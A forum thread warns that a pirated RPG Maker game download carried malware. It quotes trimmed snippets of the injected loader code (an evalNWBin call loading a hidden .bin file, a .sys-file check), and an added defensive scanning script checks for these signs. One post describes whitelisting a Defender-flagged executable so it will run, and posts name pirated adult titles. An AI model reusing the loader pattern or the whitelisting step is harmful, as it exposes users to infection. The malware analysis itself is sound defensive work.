
PSA: Malware detected from member's upload

The user 'SlidingSubject' posted this on f95 about RJ01617050 ryuugames mediafire link:

So, I may have found a virus. Again.
I open the game
And then it immediately closes itself.
So, I downloaded a game. Seijo Rinaria No Rakuyo. Nothing new.
After setting up, I opened it, and then it immediately closed. That was weird.
So I decided to go into the game files. Guess what. All the files in the data folder are just a variation of this.
JSON:
{
    "uid":"short_uid_string",
    "bid":"mv_version_i_think",
    "data":"long_base64_string"
}
I already had a bit of experience with this due to a dev who hid the encryption key of his game, so while curious, I wasn't alarmed. Though that dev only hid the System.json file.
When I entered the js folder, there was a weird .bin file there. I moved on and searched the .js files, and I got lucky. There were two interesting things there. Changed a few things on the code, just in case.
JavaScript:
if (typeof window._X === 'undefined') {
    var p = require('path'); nw.Window.get().evalNWBin(null, p.join(process.cwd(), 'www', 'js', 'FILENAME.bin'));
}
JavaScript:
var fs = require('fs'), path = require('path'), FILENAME = 'obfuscated name of a .sys file on the same folder as Game.exe';
if (fs.existsSync(path.join(process.cwd(), FILENAME)) && typeof window.cDiv === 'undefined') {
    //stuff;
}
I tried to comment the first one, and then the game just got stuck loading. I uncommented the code and removed the .bin file from the js folder, and then it threw an error.
So I went on to the second one. I managed to get the name of the .sys file it was trying to check for, but it wasn't there, so I made an empty .txt file, renamed it to the .sys one, and opened the game. The results are in the spoiler up there.

I had it opened from a different thing I was doing, so I got lucky detecting this. Can anyone check exactly what this is trying to do? Here's a download link for the maybe virus, and since it's from ryuugames.com, that's the password.
https://www.virustotal.com/gui/file...7daff7fee03566e1832a985641df0c4f2ec/detection
 
I see lots of uploads for RJ01617050

Triage needed if this was modified or source
 
My post after his:

Could be malware or a very aggressive DRM (scanning for reverse engineering tools).
 
yeah they even include cheat_engine, weird huh
 
He posted more info:
Seems like only the ryuu download is infected, I just downloaded one from two different sources (from the slow ones) and it's fine.

Ran fc on non-data files (.rpgmv and .json, since the ones from the other source don't have their .json files encrypted), and everything was the same (a few extra empty bits at the end of libEGL.dll and libGLESv2.dll though), except for the rpg_managers.js file. I'll just comment on the differences showing the original script.

JavaScript:
DataManager.loadDataFile = function(name, src) {
    //virus code added a call to the .bin file
    var xhr = new XMLHttpRequest();
    var url = 'data/' + src;
    xhr.open('GET', url);
    xhr.overrideMimeType('application/json');
    xhr.onload = function() {
        if (xhr.status < 400) {
            window[name] = JSON.parse(xhr.responseText);
            DataManager.onLoad(window[name]);
            //virus replaced the above two lines for a try catch, with everything following inside the try
            //it checked for the .sys file to create a console thing
            //after which it read the base64, did bitwise operations on it based on some function from the .bin file
            //and finally it executed these two lines, the b variable is the base64 that was also modified
            //window[name] = JSON.parse(b.toString('utf8').replace(/^\uFEFF/, ''));
            //DataManager.onLoad(window[name]);
        }
    };
    xhr.onerror = this._mapLoader || function() {
        DataManager._errorUrl = DataManager._errorUrl || url;
    };
    //no idea why the virus also removed the above onerror function too
    window[name] = null;
    xhr.send();
};

Also, huh, a thread was made with the virus link, I think that should be changed, it has the corrupt script.
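
The indicators SlidingSubject describes (a .bin file in the js folder, an evalNWBin call, a rewritten DataManager.loadDataFile, and data files reduced to a uid/bid/data wrapper) can all be checked without launching the game. The Node.js script below is an added example, not code from the thread; its function names are made up here, and a finding means "review this file", since the same pattern could also be DRM.

```javascript
// Added example: static triage of an extracted RPG Maker MV game folder (hypothetical helper names).
const fs = require('fs');
const path = require('path');

// Stock loader line from the original rpg_managers.js quoted above.
const STOCK_PARSE = 'window[name] = JSON.parse(xhr.responseText)';

// True when a data/*.json file is only a {uid, bid, data:<base64>} wrapper.
function isWrappedDataFile(text) {
  let doc;
  try { doc = JSON.parse(text.replace(/^\uFEFF/, '')); } catch (e) { return false; }
  if (doc === null || typeof doc !== 'object' || Array.isArray(doc)) return false;
  const keys = Object.keys(doc).sort().join(',');
  return keys === 'bid,data,uid' && typeof doc.data === 'string' &&
    /^[A-Za-z0-9+\/]+={0,2}$/.test(doc.data);
}

// Indicators in one script: a compiled-binary load, or a rewritten data loader.
function scanScript(name, source) {
  const hits = [];
  if (/\bevalNWBin\s*\(/.test(source)) hits.push('evalNWBin call');
  if (name === 'rpg_managers.js' && source.includes('DataManager.loadDataFile') &&
      !source.includes(STOCK_PARSE)) {
    hits.push('loadDataFile does not parse xhr.responseText directly');
  }
  return hits;
}

// Reads top-level files under <gameDir>/www/js and www/data; nothing is executed.
function triageGame(gameDir) {
  const findings = [];
  const list = (dir) => (fs.existsSync(dir) ? fs.readdirSync(dir) : []);
  const jsDir = path.join(gameDir, 'www', 'js');
  for (const f of list(jsDir)) {
    const full = path.join(jsDir, f);
    if (!fs.statSync(full).isFile()) continue;
    if (f.endsWith('.bin')) findings.push({ file: `js/${f}`, reason: 'compiled .bin in js folder' });
    if (!f.endsWith('.js')) continue;
    for (const reason of scanScript(f, fs.readFileSync(full, 'utf8'))) {
      findings.push({ file: `js/${f}`, reason });
    }
  }
  const dataDir = path.join(gameDir, 'www', 'data');
  for (const f of list(dataDir).filter((n) => n.endsWith('.json'))) {
    const text = fs.readFileSync(path.join(dataDir, f), 'utf8');
    if (isWrappedDataFile(text)) findings.push({ file: `data/${f}`, reason: 'uid/bid/data base64 wrapper' });
  }
  return findings;
}
```

Call triageGame with the folder that contains Game.exe and www; an empty array means none of these specific indicators were found, not that the download is clean.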
 
Oh, I got an infected game from ryuugames in the past too, their ops seem to be very similar to IGG games, people still fall for it
 
What I really don't like is how ryuugames operates, because the owner doesn't really check where the game source came from, whether it is safe or not.

It was never clarified. I think ryuugames should be getting notes or something for the future, because a lot of people get infected like this.
 
  • Wow
Reactions: gitama
Some games containing the Miner issues that arose at the beginning of the year are still on this site, so please check if you are an uploader.

[RJ01522545] IDOL CONFLICT

I have reported the files I personally verified directly to the uploader, but I have not checked files uploaded by other uploaders. I suspect they are sharing files from the same source, so I would appreciate it if you could check.

Add:
The CRC values for libEGL.dll and libGLESv2.dll matched those of the trial version, confirming that the infection occurred after actually running the .exe file.
 
I compared Ryzen111 (left), Shine (middle) and Otokonoko (right), and it seems cryptbase.dll & d3dcompiler_64.dll were still in the middle & right ones, which I think were the virus DLLs before?
The only other difference is resources.pak: the size for Shine & Otokonoko was 40753879, while for Ryzen111 it was 5245483.

As for the others I checked (ramori, nobodyknows22, UFO, Nihonjaki90), they all have cryptbase.dll too.

 
I already fixed my file. Windows Defender was updated to detect this malware, so make sure your Windows is up to date.
 
The original game only contains the one that has data.win, no Unreal Engine stuff.
 
Please note, this sort of thing is WAY beyond my understanding, all I know was a couple games from senior respected uploaders triggered Microsoft Defender, but I have no way of knowing if it was just false positives (only about 4 out of about 80 downloads)

If one of the Experts here could check the files out & see if there is nothing wrong with them, thank you very much, I know how important your time is.

Digital G Power:
Monoshizuka de Bijin no Mama ni Gouin ni Kyousei Shaseisaserareru Boku____物静かで美人のママに強引に強制射精させられるボク

uploaded by Nihonjaki90 on 8/16/2023

Here:

Just unzipping the file causes Microsoft Defender to quarantine the Game.exe

I had to Whitelist all contents in the folder I unzipped the .rar into to stop the .exe from autodeleting

& i think I had to add "2djgame.txt file" to Game Folder to get it to run, but I don't remember how I found that out (while the game runs smoothly after all that, it still leaves me uneasy, but I'm a MASSIVE Mom+Son Inbreeding Addict, it's like literal heroin{e} to me)


Most Other games I downloaded from here seemed fine, except 2 from a small developer called Inohead Games:
Bitch KazokuFile____ビッチ家族変態な日常
ESG-001200 by Esan?

& Bakunyuu Mama Haramase Netori____爆乳ママ孕ませ寝取り~極悪少年のママビッチ化計画~

uploaded by Yuuichi Sagara? (the Rapidshare link now says Premium only, but it seems I downloaded it back in 2023?)


& this from ANIM?